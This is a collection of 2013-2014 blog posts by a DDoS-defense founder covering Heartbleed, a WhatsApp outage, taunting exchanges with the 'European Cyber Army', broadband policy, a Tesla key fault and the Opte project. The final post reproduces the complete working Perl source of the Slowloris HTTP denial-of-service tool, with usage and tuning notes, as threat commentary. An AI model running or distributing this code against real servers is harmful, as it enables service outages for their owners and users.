Defense.Net Squashes The Heartbleed Bug

April 9th, 2014 by Barrett Lyon
http://heartbleed.com:
CVE-2014-0160

“The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.“

Unless an OpenSSL implementation has been patched anyone can remotely view 64K chunks of memory. Said another way, whatever was left behind in the memory of the vulnerable server… becomes public data… This could be passwords, accounts, personal data, and the SSL private keys of the server itself!

To give you an idea of how big of a problem this is, this software is used in everything from web sites, VPNs, specialized networking equipment, email communications, phones apps, you name it.

There are at least half of a million web sites that are exposed to this and this may be one of the most catastrophic bugs in secure computing history.

Whether or not this is a bug or an intentional addition is all speculation at this point and it’s been in the software for over two years, exposing anyone using OpenSSL.

To make matters worse, once the bug has been patched globally, it’s highly likely that every SSL certificate that has been on an exposed server will have to be re-issued creating an absolute logistical and security nightmare.

The cost of replacing half a million SSL certificates could range in the several hundreds of millions of dollars and it’s unclear when this can or will happen

 

How Defense.Net squashes the Heartbleed Bug

My company, Defense.Net has built a secure network the primary purpose for which is to provide DDoS mitigation.  However, the safeguards we put in place with our proprietary DefenseD scrubbing system to protect against DDoS attacks also protects against the Heartbleed attack vector.

The byproduct of DDoS defense in this case is a better more protected network and further explains why DDoS defense is more than keeping your sites online when they’re attacked with hundreds of gigabits of garbage… they’re full defensive networks.  In the process of cleaning up invalid bots and removing attack traffic, we also validate legitimate network protocols against illegitimate ones.  This ability to safeguard our customers from more than just DDoS attacks helps outline our goals and the future of our network.

We’re capable of doing this because we’re using a proprietary SSL implementation on one layer of our network and on another layer of our network we can monitor and block the behavior of traffic that attempts to exploit the bug.

What’s going on with WhatsApp?

February 22nd, 2014 by Barrett Lyon

WhatsApp went down today around 8:30 AM Pacific and was lights out for about six hours and still continues to struggle to connect users into their network.  In addition, when connected it’s not possible to share images, videos, and audio.

Looking at their network design it’s clear to me that they appear to have their eggs in one basket. The application initially connects to the host “c.whatsapp.net” which is hosted on a single /24 block on SoftLayer (mid-tier hosting provider):

c.whatsapp.net. 3600 IN A 50.22.231.54
c.whatsapp.net. 3600 IN A 50.22.231.55
c.whatsapp.net. 3600 IN A 50.22.231.56
c.whatsapp.net. 3600 IN A 50.22.231.57
c.whatsapp.net. 3600 IN A 50.22.231.58
c.whatsapp.net. 3600 IN A 50.22.231.59
c.whatsapp.net. 3600 IN A 50.22.231.60
c.whatsapp.net. 3600 IN A 50.22.231.36
c.whatsapp.net. 3600 IN A 50.22.231.44
c.whatsapp.net. 3600 IN A 50.22.231.45
c.whatsapp.net. 3600 IN A 50.22.231.46
c.whatsapp.net. 3600 IN A 50.22.231.47
c.whatsapp.net. 3600 IN A 50.22.231.48
c.whatsapp.net. 3600 IN A 50.22.231.49
c.whatsapp.net. 3600 IN A 50.22.231.50
c.whatsapp.net. 3600 IN A 50.22.231.51
c.whatsapp.net. 3600 IN A 50.22.231.52
c.whatsapp.net. 3600 IN A 50.22.231.53

50.22.231.0/24 appears to host all of the c.whatsapp.net hosts which makes it vulnerable to a DDoS attack and hijacking.  It’s generally bad design to put all of your critical services on a single host that’s routed to a single network provider in a single location.

In addition, 184.173.136.0/24 is at the same datacenter with the same provider and hosts a bunch the mms and chat functions of the application… which was also not working properly.

Discounting the design, the SoftLayer network looks like it’s healthy and there are no indications of a volumetric DDoS attack such as latency or jitter and the network itself appears to be up working just fine.

So what’s wrong?  Well, the c.whatsapp.net IP addresses are not answering on port 443 reliably.  Sometimes they open and function and sometimes they don’t.  That indicates that there is one of three things going on:

  • Application layer DDoS on port 443 (SSL) to their c.whatsapp.net host
  • Application bug
  • Extreme growth

Given this has gone on all day I would imagine a bug would have been fixed quickly.

So… Is it an application layer DDoS attack?  I don’t know.  The Facebook acquisition angered a lot of users and the timing of the outage looks pretty suspect, however, calling it a DDoS is still speculative.  The service has been stable for me for years.

If I were to guess:  It’s a rapid growth problem which helped them discover new limits in either their firewall hardware or their load balancers.  They tend to be the thing that breaks first. Replacing or upgrading hardware like a load balancer in hours is typically not easy.

Regardless of if it’s an application layer DDoS attack or just unprecedented growth I am really worried about their design… It reminds me of the early days of Twitter.  

P.S.:  I wish the team at WhatsApp best of luck to get this fixed whatever it is…  I miss chatting with my friends.

The European Cyber Army Has Bits

January 31st, 2014 by Barrett Lyon

After enough taunting of the European Cyber Army (ECA) launched modest attack against blyon.com.  The traffic has yet to exceed 1 Gbps and it’s comprised of a smorgasbord of attack methods:

Initially the attack came in as a HTTP HEAD and GET flood requesting different items from my site.  Shortly after a DNS reflection attack and an ICMP reflection attack came into blyon.com as well.

The HEAD attack was directed to a single image with the User-Agent of “ICAP-IOD”.

The GET flood contained a User-Agent of  ”LOWC=@ECA_Legion&ID=1391196316226″

Luckily I am the CTO/Founder of a DDoS defense company (Defense.Net), so getting an attack like this to my personal blog is really not a big deal. However with this modest attack, an unprepared or unprotected web site will struggle.  If this attack was in fact directed at paser.gov or other small unprotected sites they probably would be impacted.

This is not a confirmation that the ECA launched the attack to the targets they boast about.  The attack to me could be a random sympathetic user to the ECA, however, they do have the ECA Twitter handle as part of the User-Agent string in the attack hitting my server.

If you’re a server administrator at any of their alleged targets, contact me if you saw any of the User-Agents I saw.

Is the “European Cyber Army” Capable of Big DDoS Attacks?

January 31st, 2014 by Barrett Lyon

I follow what’s happening in the DDoS world very closely and when I see banks go down for extended periods of time, that tells me that someone has a large botnet. On Twitter, a group calling itself the “European Cyber Army” took claim for the attacks on January 29th. Their claim prompted me to do a little digging and Tweeting to learn more.

I wrote a blog post that was loaded with items that would intentionally irritate them. I wanted to see what kind of reaction I would get. It was not met with a warm reception and they began to threaten me on Twitter and hit me with a little tiny 6Mbps GET flood:

ECA_Legion: …We have a mind to destroy your website!

[I say nothing and an attack starts.]

BarrettLyon: It was a cute GET flood
ECA_Legion: thank you!
BarrettLyon: It didn’t do anything.
BarrettLyon: I guess I was expecting a real DDoS and not a cute one.
ECA_Legion: If we want the site to go down we will hit it! Right now we are busy on an important target!
ECA_Legion: At times we will threaten and never follow through! But like we said, hit us up when we aren’t busy and we will take it down!
BarrettLyon: Sounds like you’re just finding site outages and reporting them as if you did the DDoS. Your “attack” kinda proves my theory.
ECA_Legion: Believe what you what!
BarrettLyon: I thought you were going to attack me? That’s what you threatened me with right?
ECA_Legion: We did threaten to do that! But sadly your site isn’t injectable! Dammit!
BarrettLyon: What does an injection attack have to do with DDoS?
BarrettLyon: So all this #tangodown stuff is what I thought it was. #faildown
ECA_Legion: You doubt our DDoS abilities?
BarrettLyon: I’m pretty sure that’s what I said.
ECA_Legion: Then you will enjoy the upcoming attacks! Lulz
BarrettLyon: Okay cool, well… I’m going to dinner with my family. Have fun sending me “upcoming attacks”.

At that point I went to dinner and I have not seen a single DDoS attack. Meanwhile they keep Tweeting that they’re taking sites down and defacing sites with an injection attack.

They may be taking sites down with their 6Mbps GET flood but I don’t think they’re doing it with a 200 Gbps capable botnet.

So, that begs the question: Who is behind the big attacks?

Here Comes the European Cyber Army

January 30th, 2014 by Barrett Lyon
With the disappearance of the Izz ad-Din al-Qassam Cyber Fighters, DDoS attacks have not been on the top of the headlines for a few months. Well, a new group calling itself the “European Cyber Army” (@ECA_Legion or ECA) has been making some news. They claim to be targeting the US military and banks, however, based on their twitter feed it appears they are taking claim for site outages and passing them off as attacks.

They claim to have attacked and downed over 60 web sites ranging from bankofamerica.com, Japanese retailers, theme parks, US military sites, and numerous foreign sites.

I found it odd they were targeting such a wide list of web sites, so I tweeted about the random list of hosts they were targeting. They responded directly to me with, “‪@BarrettLyon Casualties of warfare”.

What war they are fighting or starting is not exactly clear. They’ve posted a YouTube propaganda video, which basically declare they’re mad at nearly everything and everyone:

The Bank of America and Chase attacks made public news as the attacks clearly impacted their sites. The European Cyber Army tweeted the following statement:

Bank of America’s site was unresponsive during the tweet but it’s unclear if they were calming responsibility or if they actually did the attack.

Following Bank of America, someone launched an attack to chase.com.  The Euro Cyber Army guys made the following statements on their Twitter account:

Some large attacks have happened (maybe not carried out by these guys) and they appear to have been extremely successful and were at rates of around 190 Gbps.  I believe the actual attacks were accomplished with a derivative of the Brobot, which was what the al-Qassam Cyber Fighters were using.  There are other rumors that they have some control over the IADAQ botnet but that does not seem to be true.

To date, the would-be attacks appear to be sprinkled around as they make a stir at each of their targets. They take a site down for a few hours and then shift the focus to a new target. They may be shifting the attack to create pain at their target without having their botnet overly exposed or they’re just reporting outages as attacks and eventually the site goes back online.

Who are these guys?  Based on a pastebin post that they are a group of hackers from LeakSecurity (#LeakSec) , possibly people affiliated with @OpFunKill, and @oG_maLINKo.

Stay tuned for more updates.

UPDATE:  They didn’t like my blog post and threatened to attack me, “We have a mind to destroy your website!”  They did actually attack with a little 5Mbps GET Flood which was quickly shut-off.

I responded with, “@ECA_Legion Sounds like you’re just finding site outages and reporting them as if you did the DDoS. Your ‘attack’ kinda proves my theory.”

The conversation ended with, “@BarrettLyon Believe what you what!”

Still no major attack.

 

As American Culture Shifts Online… Why Are We Okay with Second-World Internet Connectivity?

January 23rd, 2014 by Barrett Lyon

As a child, I was an early Internet user. There were still .arpa addresses attached to things, and from day one, I realized I was a consumer of the vast data on the Internet. I needed bandwidth to download, view, exchange, and to work faster. And as a child with no job, the dream of having any high-speed access was a distant one. It shaped my career as I started my quest to have as much bandwidth as I needed. Over the course of the startups I have created, I always insisted that the offices connect with top-quality connectivity. The argument goes like this: We’re creating the world’s top new technology, why don’t we have access to it?

Spoiled over the years with having gigabit Ethernet to my desktop, I moved to Auburn, CA in the Sierra Nevada Foothills. Bay Area people may recognize its name because of the famous burger shack Ikeda’s that is right up the street from me. It’s where my family lives and I telecommute to work four days a week. But it’s difficult to telecommute to work when your home network connection is inconsistent with latency, bandwidth availability, or even having it work “most of the time.” As a result, it has hampered my VoIP calls, my research work, and my ability to do my job. Something had to change. I signed up for a fiber service for businesses that’s equivalent in cost to a the 90′s T1 line.

So what is a Gigabit? And so what? Well first off, it’s 1000 Mbps of bandwidth, and if it’s delivered over fiber, it has lower latency by an order of magnitude from a cable modem or DSL. So I bought burstable bandwidth. I only needed about 10 Mbps of the total 1000, but the ISP allows me to use all of the 1000 if it’s available and nobody is using it. It’s a great deal for me, and it’s really no sweat off the carrier’s back.

BUT NOW WHAT?

Why should everyone have burstable 1 Gigabit or 10 Gigabit service? Because the world has changed. People now consume bandwidth on most of their devices, cars, TVs, AppleTVs, Google services, etc… and it’s important to our daily lives. Lack of fast connectivity is like settling for tainted brown water from your local water utility, or having your lights shut off when you use an electric oven. People, we’re living in the stone ages of the Internet and we need to progress!

One of the main impacts of switching to an Ethernet-based solution is your upload speed does not (and should not) impact your download speed. For years, ISPs have used this as a false marketing mechanism to differentiate “business class” services from “home services.” They needed a reason they could charge businesses a boatload of money for their Internet access, while providing something similar to home users for a fraction of the cost. The marketing decision matched well with the cable modem DOCSIS and DSL technology, and as a result, became the standard for home Internet services.

That bandwidth model worked well for the 90s, but the Internet has changed. With a real Internet connection, we can download as fast as most storage devices can store, and fully utilize cloud services. HD videos play instantly, while not impacting overall network performance. Web pages snap into place, and everything just works better. Beyond being an Internet consumer, with a real Internet connection you can create – as well as consume. Uploading and serving content gives a user the ability to be more than just a consumer. This is an ideological change. When it affects millions, the Internet and culture will be directly impacted. The Internet will not be made of servers and users anymore, because everyone will have the capacity to be both.

Imagine if the new gold standard of home Internet connectivity was full duplex (the same speed both ways at the same time) 1GbE. Those huge HD files off HD cameras would then find their way onto the web very quickly. Sharing content between friends would no longer be done via a third-party service like Dropbox. The Internet would depend more on the cloud as the Internet connection, reducing the bottleneck between cloud services and the user. In addition, person-to-person networks would become feasible. It would spark innovation. Startups that are network-based could be hosted from your garage. Bandwidth would no longer be expensive, and networks would have a new renaissance of growth.

Beyond just the ability to upload at a reasonable rate, we would see our home networks become more stable. We would have fewer angry calls to call centers because, “the cable modem starts blinking a weird color when it’s raining outside.” The jitter of the network would be gone and we’d no longer be consumers of a poor quality service, we would have something we could trust to build a network-based society on.

All media companies should be pushing cable operators to switch everyone to gigabit Ethernet or faster. Why? Because they will consume (buy) more content. Right now on a gigabit circuit, it takes less than three minutes to download an entire HD movie from iTunes. People will use services like Netflix much more because it would work so much better than anything else out there.

So, what about the cost?

For an early adopter, it’s not easy. It’s expensive, because you have to buy what’s essentially a business-class or carrier-class service. However for the provider, the cost is nothing compared to the cable and here’s why:

  • Physical copper cable costs more than fiber
  • Replacing cable that is faulty is expensive and should just be done with fiber
  • The equipment is inexpensive
  • Support costs go down due to fewer interruptions
  • Service quality increases

What about the arguments that uploaded content costs ISPs more, or that it will cost more to upgrade their networks? To that I say: I don’t see any telecommunications companies filing for bankruptcy. Innovation, social change, and inspiration bring customers. Their networks can support bi-directional communications. Companies like Comcast would love to make you think that it’s a huge burden to carry traffic out of their network, but just by the nature of Ethernet being bi-directional, if Comcast is supporting the same in-bound bandwidth to their customers they can rationally support the same out-bound bandwidth.

In 2009, the American Recovery and Reinvestment Act (Recovery Act) was chartered by President Obama to create a National Broadband Plan. The plan itself is about effective as the HealthCare.gov website. However, unlike HealthCare.gov, the plan actually does not do anything for the consumer. It lays out a lot of legal liability for carriers such as Comcast to reduce their operating cost, but falls horribly short on making any real guidelines that will impact the future. The plan states, “Goal No. 1: At least 100 million U.S. homes should have affordable access to actual download speeds of at least 100 megabits per second and actual upload speeds of at least 50 megabits per second.” It suggests that should happen in the next DECADE. Ten years from now, my thermostat will have more bandwidth than that – actually it does already. Hmm, okay, in ten years my phone will have more bandwidth than that. Hmm, it almost does today. What they’ve done is to spend a huge amount of time and money to create short-sided goals. It should have read, “By X date, all Americans with at least X connectivity will be provided full bidirectional service of at least 1000 Mbps.”

When it comes down to it, consumers need to demand more – not just from their ISPs, but from the lack of any true leadership from elected officials. This country should be a leader in broadband, not a mess of red tape with the lack of any vision.

Our first “breakdown” with our Tesla Model S

September 20th, 2013 by Barrett Lyon

We’ve been purely ecstatic with our Tesla since the moment we decided to go forward with it. It really is the car that everyone boasts about. But like any new car, I was still somewhat worried when it has a bad day. That bad day came last Monday when we parked at the local airport and tried to drive it home. The car would not recognize the keys and would not turn on.  It just sat there with the AC on and Stereo going, “Key Not Inside”.

We called Tesla’s support line and ran over a bunch of options to engage the keys again – none worked. The car was just stuck where we parked it. They spoke with their engineers and decided the car needed a “cluster reboot”. They issued the reboot remotely to the console cluster. Apparently the “cluster” is the gauges behind the steering wheel controlled by a dedicated computer. That computer apparently also controls the key system.

After a few hours of fooling around and being on the phone, the keys were finally working again. However, this begs the question: How the hell did that happen?

This is where Tesla got a little vague and promised it would never happen again. I got into a semantic disagreement with them over the words “glitch” and “software” bug. They finally gave up and said, “We don’t know why this happened, it’s only happened to 3 other people I have spoken with.” This means that this has happened to more people than just us.

Finally, they escalated the issue to an engineer and the answer was, “The keys are highly sensitive to radio frequencies, and at airports there are a lot of different things going on with radio frequencies.”

This answer did not really help and I could not stop thinking about a situation where someone could figure out how to deactivate keys to Teslas with a simple radio device – and could then disable all of the cars parked at a super charger station.

It also made me think hard about what a botched software update or decent software hack could do to thousands of cars.

Anyhow, we were told it shouldn’t happen again, but if it does, we can simply “reboot the cluster” and it would be fine.

My answer to them was, “Isn’t that how Microsoft told people to deal with their bugs?”

 

PS:  I still love the car and yes… they were able to remotely fix it.  :)

 

 

 

Opte and LGL 1.2

April 16th, 2013 by Barrett Lyon

It’s been several years since I have released a new “opte” image of the Internet.  I started working on the new images last week and I have run into a number of issues:

A)  LGL (large graph layout) 1.1 is outdated and needs to be fixed.  I’m currently trying to get the code to function in JRE 1.6 (for the viewer application).  I also want to create fixed points on the image for the largest networks, thus allowing me to create full motion animations of the Internet day-by-day.  I’m taking over the LGL project form its creator Alex Adai and we will be releasing LGL 1.2 very soon.

B)  The web site is outdated.  I’d like to replace the web site with a WordPress blog skin that is unique and works well.   In there I will release the entire Opte package with the updated LGL-1.2 release which should give people the ability to create their own images.

C)  I’d like to connect with some educators about the image to see if it’s possible to create some teaching curriculum for children grades k to 12.  I think children are woefully uneducated on how networking works.  Our lives are dependent on the Internet and yet we don’t teach networking basics to children.  It’s very painful for me to watch this generation grow up on trust that devices will just work.   Launching the new image will give me and whomever is interested a nice launching pad for discussions around this topic.

If you’re interested in helping at any level, please contact me.

Interesting DDoS Attack Tool Of The Week: Slowloris

April 2nd, 2013 by Barrett Lyon

I often run into interesting DDoS related items in the wild.  Rather than talking about them internally, I find it fitting to discuss them openly and publicly.

On April 2nd we found this rather interesting script floating in the wild, it’s been around since 2012 but it seems to be floating around a little more now.  The script is named Slowloris and is designed to eat up a small web server’s available sockets or its worker threads.  It’s not a new concept or attack vector but it’s interesting to see people writing scripts that attempt to exploit hard coded server limitations.

It’s cutely documented and given the fact that it has hard-coded headers makes it fairly easy to detect.  It even states, ”Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices”.

Here it is:


#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
 .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
.  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
     .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
  'shost=s'   => \$shost,
  'dns=s'     => \$host,
  'httpready' => \$httpready,
  'num=i'     => \$connections,
  'cache'     => \$cache,
  'port=i'    => \$port,
  'https'     => \$ssl,
  'tcpto=i'   => \$tcpto,
  'test'      => \$test,
  'timeout=i' => \$timeout,
  'version'   => \$version,
);
if ($version) {
  print "Version 0.7\n";
  exit;
}
unless ($host) {
  print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
  print "\n\tType 'perldoc $0' for help with options.\n\n";
  exit;
}
unless ($port) {
  $port = 80;
  print "Defaulting to port 80.\n";
}
unless ($tcpto) {
  $tcpto = 5;
  print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
  unless ($timeout) {
      $timeout = 100;
      print "Defaulting to a 100 second re-try timeout.\n";
  }
  unless ($connections) {
      $connections = 1000;
      print "Defaulting to 1000 connections.\n";
  }
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
  print "Multithreading enabled.\n";
  $usemultithreading = 1;
  use threads;
  use threads::shared;
}
else {
  print "No multithreading capabilites found!\n";
  print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
  $sendhost = $shost;
}
else {
  $sendhost = $host;
}
if ($httpready) {
  $method = "POST";
}
else {
  $method = "GET";
}
if ($test) {
  my @times = ( "2", "30", "90", "240", "500" );
  my $totaltime = 0;
  foreach (@times) {
      $totaltime = $totaltime + $_;
  }
  $totaltime = $totaltime / 60;
  print "This test could take up to $totaltime minutes.\n";
  my $delay   = 0;
  my $working = 0;
  my $sock;
  if ($ssl) {
      if (
          $sock = new IO::Socket::SSL(
              PeerAddr => "$host",
              PeerPort => "$port",
              Timeout  => "$tcpto",
              Proto    => "tcp",
          )
        )
      {
          $working = 1;
      }
  }
  else {
      if (
          $sock = new IO::Socket::INET(
              PeerAddr => "$host",
              PeerPort => "$port",
              Timeout  => "$tcpto",
              Proto    => "tcp",
          )
        )
      {
          $working = 1;
      }
  }
  if ($working) {
      if ($cache) {
          $rand = "?" . int( rand(99999999999999) );
      }
      else {
          $rand = "";
      }
      my $primarypayload =
          "GET /$rand HTTP/1.1\r\n"
        . "Host: $sendhost\r\n"
        . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
        . "Content-Length: 42\r\n";
      if ( print $sock $primarypayload ) {
          print "Connection successful, now comes the waiting game...\n";
      }
      else {
          print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
          print "Is something wrong?\nDying.\n";
          exit;
      }
  }
  else {
      print "Uhm... I can't connect to $host:$port.\n";
      print "Is something wrong?\nDying.\n";
      exit;
  }
  for ( my $i = 0 ; $i <= $#times ; $i++ ) {
      print "Trying a $times[$i] second delay: \n";
      sleep( $times[$i] );
      if ( print $sock "X-a: b\r\n" ) {
          print "\tWorked.\n";
          $delay = $times[$i];
      }
      else {
          if ( $SIG{__WARN__} ) {
              $delay = $times[ $i - 1 ];
              last;
          }
          print "\tFailed after $times[$i] seconds.\n";
      }
  }
  if ( print $sock "Connection: Close\r\n\r\n" ) {
      print "Okay that's enough time. Slowloris closed the socket.\n";
      print "Use $delay seconds for -timeout.\n";
      exit;
  }
  else {
      print "Remote server closed socket.\n";
      print "Use $delay seconds for -timeout.\n";
      exit;
  }
  if ( $delay < 166 ) {
      print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all...  you might have trouble using Slowloris against this target.  You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
  }
}
else {
  print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
  if ($usemultithreading) {
      domultithreading($connections);
  }
  else {
      doconnections( $connections, $usemultithreading );
  }
}
sub doconnections {
  my ( $num, $usemultithreading ) = @_;
  my ( @first, @sock, @working );
  my $failedconnections = 0;
  $working[$_] = 0 foreach ( 1 .. $num );    #initializing
  $first[$_]   = 0 foreach ( 1 .. $num );    #initializing
  while (1) {
      $failedconnections = 0;
      print "\t\tBuilding sockets.\n";
      foreach my $z ( 1 .. $num ) {
          if ( $working[$z] == 0 ) {
              if ($ssl) {
                  if (
                      $sock[$z] = new IO::Socket::SSL(
                          PeerAddr => "$host",
                          PeerPort => "$port",
                          Timeout  => "$tcpto",
                          Proto    => "tcp",
                      )
                    )
                  {
                      $working[$z] = 1;
                  }
                  else {
                      $working[$z] = 0;
                  }
              }
              else {
                  if (
                      $sock[$z] = new IO::Socket::INET(
                          PeerAddr => "$host",
                          PeerPort => "$port",
                          Timeout  => "$tcpto",
                          Proto    => "tcp",
                      )
                    )
                  {
                      $working[$z] = 1;
                      $packetcount = $packetcount + 3;  #SYN, SYN+ACK, ACK
                  }
                  else {
                      $working[$z] = 0;
                  }
              }
              if ( $working[$z] == 1 ) {
                  if ($cache) {
                      $rand = "?" . int( rand(99999999999999) );
                  }
                  else {
                      $rand = "";
                  }
                  my $primarypayload =
                      "$method /$rand HTTP/1.1\r\n"
                    . "Host: $sendhost\r\n"
                    . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                    . "Content-Length: 42\r\n";
                  my $handle = $sock[$z];
                  if ($handle) {
                      print $handle "$primarypayload";
                      if ( $SIG{__WARN__} ) {
                          $working[$z] = 0;
                          close $handle;
                          $failed++;
                          $failedconnections++;
                      }
                      else {
                          $packetcount++;
                          $working[$z] = 1;
                      }
                  }
                  else {
                      $working[$z] = 0;
                      $failed++;
                      $failedconnections++;
                  }
              }
              else {
                  $working[$z] = 0;
                  $failed++;
                  $failedconnections++;
              }
          }
      }
      print "\t\tSending data.\n";
      foreach my $z ( 1 .. $num ) {
          if ( $working[$z] == 1 ) {
              if ( $sock[$z] ) {
                  my $handle = $sock[$z];
                  if ( print $handle "X-a: b\r\n" ) {
                      $working[$z] = 1;
                      $packetcount++;
                  }
                  else {
                      $working[$z] = 0;
                      #debugging info
                      $failed++;
                      $failedconnections++;
                  }
              }
              else {
                  $working[$z] = 0;
                  #debugging info
                  $failed++;
                  $failedconnections++;
              }
          }
      }
      print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
      sleep($timeout);
  }
}
sub domultithreading {
  my ($num) = @_;
  my @thrs;
  my $i                    = 0;
  my $connectionsperthread = 50;
  while ( $i < $num ) {
      $thrs[$i] =
        threads->create( \&doconnections, $connectionsperthread, 1 );
      $i += $connectionsperthread;
  }
  my @threadslist = threads->list();
  while ( $#threadslist > 0 ) {
      $failed = 0;
  }
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service.  It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively.  It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data.  Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts.  There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances.  Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for.  If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows.  For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds.  The following example uses 500 sockets.  Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration.  Some are less than 300.  The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision.  The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful.  Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
